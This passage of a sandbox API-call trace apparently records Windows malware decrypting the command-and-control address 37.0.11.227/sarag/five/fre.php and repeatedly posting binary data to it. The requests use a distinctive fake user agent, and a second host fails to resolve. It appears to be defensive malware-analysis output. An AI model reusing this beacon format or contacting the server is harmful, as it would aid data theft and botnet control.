returned="/sarag/five/fre.php" [0287.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.373] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0287.373] GetProcessHeap () returned 0x690000 [0287.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0287.373] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0287.373] GetProcessHeap () returned 0x690000 [0287.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0287.373] socket (af=2, type=1, protocol=6) returned 0x934 [0287.374] connect (s=0x934, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0287.410] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0287.410] GetProcessHeap () returned 0x690000 [0287.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0287.410] GetProcessHeap () returned 0x690000 [0287.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0287.411] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0287.412] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0287.412] GetProcessHeap () returned 0x690000 [0287.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0287.412] GetProcessHeap () returned 0x690000 [0287.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0287.412] GetProcessHeap () returned 0x690000 [0287.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0287.412] GetProcessHeap () returned 0x690000 [0287.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0287.413] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0287.413] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0287.413] GetProcessHeap () returned 0x690000 [0287.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0287.414] GetProcessHeap () returned 0x690000 [0287.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0287.414] send (s=0x934, buf=0x6ad508*, len=242, flags=0) returned 242 [0287.415] send (s=0x934, buf=0x6aba40*, len=159, flags=0) returned 159 [0287.415] GetProcessHeap () returned 0x690000 [0287.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0287.415] recv (in: s=0x934, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0287.490] GetProcessHeap () returned 0x690000 [0287.490] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0287.490] GetProcessHeap () returned 0x690000 [0287.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0287.491] GetProcessHeap () returned 0x690000 [0287.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0287.491] GetProcessHeap () returned 0x690000 [0287.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0287.491] closesocket (s=0x934) returned 0 [0287.492] GetProcessHeap () returned 0x690000 [0287.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0287.492] GetProcessHeap () returned 0x690000 [0287.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0287.492] GetProcessHeap () returned 0x690000 [0287.493] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0287.493] GetProcessHeap () returned 0x690000 [0287.493] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0287.495] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x178c) returned 0x934 [0287.496] Sleep (dwMilliseconds=0xea60) [0287.498] GetProcessHeap () returned 0x690000 [0287.498] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0287.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.500] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.517] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0287.525] GetProcessHeap () returned 0x690000 [0287.525] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0287.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.527] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0287.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.528] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.529] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.529] GetProcessHeap () returned 0x690000 [0287.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0287.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.541] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0287.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.542] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0287.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.543] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0287.543] GetProcessHeap () returned 0x690000 [0287.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0287.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.544] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.545] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.546] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.547] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.547] GetProcessHeap () returned 0x690000 [0287.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0287.547] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0287.547] GetProcessHeap () returned 0x690000 [0287.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0287.548] GetProcessHeap () returned 0x690000 [0287.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0287.548] GetProcessHeap () returned 0x690000 [0287.549] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0287.549] GetProcessHeap () returned 0x690000 [0287.549] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0287.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.550] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.555] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0287.561] GetProcessHeap () returned 0x690000 [0287.561] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0287.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.562] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0287.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.562] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.563] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.563] GetProcessHeap () returned 0x690000 [0287.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0287.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.565] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0287.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.566] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0287.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.567] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0287.567] GetProcessHeap () returned 0x690000 [0287.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0287.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.568] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0287.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.569] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0287.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.570] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0287.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.570] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0287.571] GetProcessHeap () returned 0x690000 [0287.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0287.571] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0287.571] GetProcessHeap () returned 0x690000 [0287.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0287.571] socket (af=2, type=1, protocol=6) returned 0x938 [0287.571] connect (s=0x938, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0287.597] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0287.597] GetProcessHeap () returned 0x690000 [0287.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0287.597] GetProcessHeap () returned 0x690000 [0287.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0287.598] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0287.599] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0287.599] GetProcessHeap () returned 0x690000 [0287.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0287.599] GetProcessHeap () returned 0x690000 [0287.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0287.599] GetProcessHeap () returned 0x690000 [0287.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0287.599] GetProcessHeap () returned 0x690000 [0287.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0287.600] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0287.601] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0287.601] GetProcessHeap () returned 0x690000 [0287.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0287.601] GetProcessHeap () returned 0x690000 [0287.601] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0287.601] send (s=0x938, buf=0x6ad508*, len=242, flags=0) returned 242 [0287.602] send (s=0x938, buf=0x6aba40*, len=159, flags=0) returned 159 [0287.603] GetProcessHeap () returned 0x690000 [0287.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0287.603] recv (in: s=0x938, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0287.689] GetProcessHeap () returned 0x690000 [0287.689] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0287.689] GetProcessHeap () returned 0x690000 [0287.689] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0287.690] GetProcessHeap () returned 0x690000 [0287.690] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0287.690] GetProcessHeap () returned 0x690000 [0287.690] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0287.690] closesocket (s=0x938) returned 0 [0287.691] GetProcessHeap () returned 0x690000 [0287.691] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0287.691] GetProcessHeap () returned 0x690000 [0287.692] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0287.692] GetProcessHeap () returned 0x690000 [0287.692] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0287.692] GetProcessHeap () returned 0x690000 [0287.692] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0287.693] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1794) returned 0x938 [0287.694] Sleep (dwMilliseconds=0xea60) [0287.696] GetProcessHeap () returned 0x690000 [0287.696] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0287.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.707] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0287.715] GetProcessHeap () returned 0x690000 [0287.715] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0287.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.716] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0287.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.717] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.718] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.718] GetProcessHeap () returned 0x690000 [0287.719] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0287.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.719] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0287.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.720] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0287.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.721] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0287.721] GetProcessHeap () returned 0x690000 [0287.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0287.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.722] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.723] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.725] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.726] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.726] GetProcessHeap () returned 0x690000 [0287.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0287.726] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0287.726] GetProcessHeap () returned 0x690000 [0287.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0287.727] GetProcessHeap () returned 0x690000 [0287.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0287.727] GetProcessHeap () returned 0x690000 [0287.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0287.728] GetProcessHeap () returned 0x690000 [0287.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0287.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.738] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.742] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0287.752] GetProcessHeap () returned 0x690000 [0287.752] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0287.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.755] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0287.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.756] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.757] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.757] GetProcessHeap () returned 0x690000 [0287.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0287.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.759] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0287.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.760] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0287.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.761] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0287.761] GetProcessHeap () returned 0x690000 [0287.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0287.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.762] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0287.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.763] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0287.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.765] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0287.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.768] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0287.768] GetProcessHeap () returned 0x690000 [0287.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0287.768] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0287.768] GetProcessHeap () returned 0x690000 [0287.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0287.768] socket (af=2, type=1, protocol=6) returned 0x93c [0287.769] connect (s=0x93c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0287.819] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, 